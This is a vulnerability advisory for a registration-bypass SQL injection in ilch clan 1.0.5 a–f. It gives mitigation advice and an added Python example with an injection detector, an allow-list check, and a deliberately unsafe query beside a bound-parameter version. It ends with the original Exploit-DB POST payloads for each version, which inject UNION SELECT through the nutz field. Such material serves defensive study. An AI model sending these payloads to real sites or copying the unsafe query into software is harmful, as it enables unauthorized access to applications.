Vendor: ilch clan
By: Easy Laster
CVSS: 9.3 (HIGH)
CWE: 89 (SQL Injection)
Product Name: ilch clan
Affected Version From: 1.0.5 a,b,c,d,e,f!
Affected Version To: 1.0.5 a,b,c,d,e,f!
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2011

Registration Bypass SQL Injection Vulnerability

A SQL injection vulnerability was discovered in regist.php of ilch clan 1.0.5 a,b,c,d,e,f!, allowing an attacker to bypass the registration process. The cause is improper validation of user-supplied $_POST input that regist.php passes into a database query; the Exploit-DB raw data below injects through the nutz field of the registration form. An attacker can exploit this to gain access to the application without registering.

Mitigation:

User-supplied input must be validated before use, and POST values must never be concatenated into SQL text: use prepared statements with bound parameters (the standard fix for CWE-89) and check the registration fields against a server-side allow-list. Additionally, access control should be enforced on the server so that only authorized users can reach the application's protected areas, rather than relying on the registration form alone.
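The following Python is an added example, not code from ilch clan, from Exploit-DB, or from the entry's author. It shows the three defender-side pieces a registration handler shaped like regist.php needs: a log/WAF check that decodes a form body, strips the /**/ comments used to obfuscate keywords and flags UNION ... SELECT and trailing comment terminators; an allow-list check for the username; and the string-built lookup that such a payload subverts beside the bound-parameter form that treats the same value as plain data. The users table and its row are constructed in SQLite, and the request bodies are constructed in the shape of the raw data below (field names nutz, checked and email), not captured traffic; the table layout and the lookup query are assumptions, not ilch clan's schema.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed request bodies in the shape shown in the Exploit-DB raw data
# (not captured traffic). nutz carries the comment-obfuscated UNION.
SAMPLE_BODY = (
    "checked=Gelesen+und+einverstanden"
    "&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+"
    "&email=aaaa"
)
BENIGN_BODY = "checked=Gelesen+und+einverstanden&nutz=bob_42&email=bob%40example.invalid"

INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
UNION_SELECT = re.compile(r"\bunion\b(\s+all)?\s+select\b")
TRAILING_COMMENT = re.compile(r"(--|#)\s*$")
USERNAME_OK = re.compile(r"^[A-Za-z0-9_.-]{3,32}$")


def normalize(value: str) -> str:
    """Remove /**/ comments, collapse whitespace and lowercase, so that
    keyword case games and comment-as-space tricks do not hide a pattern."""
    value = INLINE_COMMENT.sub(" ", value)
    value = re.sub(r"\s+", " ", value)
    return value.strip().lower()


def looks_like_sqli(value: str) -> bool:
    """True when one field value shows the shape seen in this entry."""
    n = normalize(value)
    return bool(UNION_SELECT.search(n) or TRAILING_COMMENT.search(n))


def flagged_fields(body: str) -> list:
    """Decode an application/x-www-form-urlencoded body and return the
    names of fields whose values look like SQL injection."""
    fields = parse_qs(body, keep_blank_values=True)
    return sorted(name for name, values in fields.items()
                  if any(looks_like_sqli(v) for v in values))


def valid_username(name: str) -> bool:
    """Allow-list check: letters, digits, '_', '.', '-', 3 to 32 characters."""
    return USERNAME_OK.fullmatch(name) is not None


def open_demo_db() -> sqlite3.Connection:
    """In-memory users table with one constructed row (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL)")
    conn.execute("INSERT INTO users (name) VALUES ('alice')")
    return conn


def username_taken_unsafe(conn: sqlite3.Connection, name: str) -> bool:
    """Vulnerable pattern: the POST value is pasted into the SQL text, so a
    quote ends the literal and UNION SELECT 1 supplies a row that never
    came from the users table."""
    sql = "SELECT id FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchone() is not None


def username_taken_safe(conn: sqlite3.Connection, name: str) -> bool:
    """Hardened form: bound parameter; the whole value is compared as data."""
    row = conn.execute("SELECT id FROM users WHERE name = ?", (name,)).fetchone()
    return row is not None


def check_registration(body: str) -> dict:
    """Run the three checks over one request body and report the outcomes."""
    fields = parse_qs(body, keep_blank_values=True)
    name = fields.get("nutz", [""])[0]
    conn = open_demo_db()
    return {
        "flagged": flagged_fields(body),
        "username_valid": valid_username(name),
        "taken_unsafe": username_taken_unsafe(conn, name),
        "taken_safe": username_taken_safe(conn, name),
    }


if __name__ == "__main__":
    for label, body in (("payload", SAMPLE_BODY), ("benign", BENIGN_BODY)):
        print(label, check_registration(body))
```

For the constructed payload body the unsafe lookup reports the username as taken even though no such user exists (the UNION supplied the row), the bound-parameter lookup reports it as not taken, the allow-list rejects the name, and the decoder flags only the nutz field; the benign body passes all three checks. Run the detection part over request logs or a WAF hook, and the allow-list plus bound parameters inside the handler itself.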
Source (Exploit-DB raw data):

 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
/                                  _____ _      _                                       \ 
\                                  \_   \ | ___| |__                                    /
/                                   / /\/ |/ __| '_ \                                   \
\                                /\/ /_ | | (__| | | |                                  /
/                                \____/ |_|\___|_| |_|                                  \
\               Security Flaw in ilch clan 1.0.5 a,b,c,d,e,f! in regist.php            /
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-                
                                         by
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
/                                                                                       \ 
\ ___ ___ ___ ___                         _ _           _____           _         _     /
/| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_   \
\|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|  /
/  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|    \
\                                              |___|                 |___|              /
/                                                                                       \
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                   SQL Injection Vulnerability in ilch clan 1.0.5 a,b,c,d,e,f! 
        Vulnerability Name : Registration Bypass SQL Injection Vulnerability 
                                 Date : 02.04.2011
                             SQL Injection method : $_POST   
                              Discovered by : Easy Laster
Security Group : Team-Internet, Undergroundagents, websec-empire.to and 4004-Security-Project.com
                               Greetings to free-hack.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                                      Security Flaws
                                 =-=-=-=-=-=-=-=-=-=-=-=
                                     ilch clan 1.0.5
checked=Gelesen+und+einverstanden&nutz=1'+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaa
                                     ilch clan 1.0.5a
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaa
                                     ilch clan 1.0.5b
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaa
                                     ilch clan 1.0.5c
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaa
                                     ilch clan 1.0.5d
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaaa
                                     ilch clan 1.0.5e
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaa
                                     ilch clan 1.0.5f
checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaa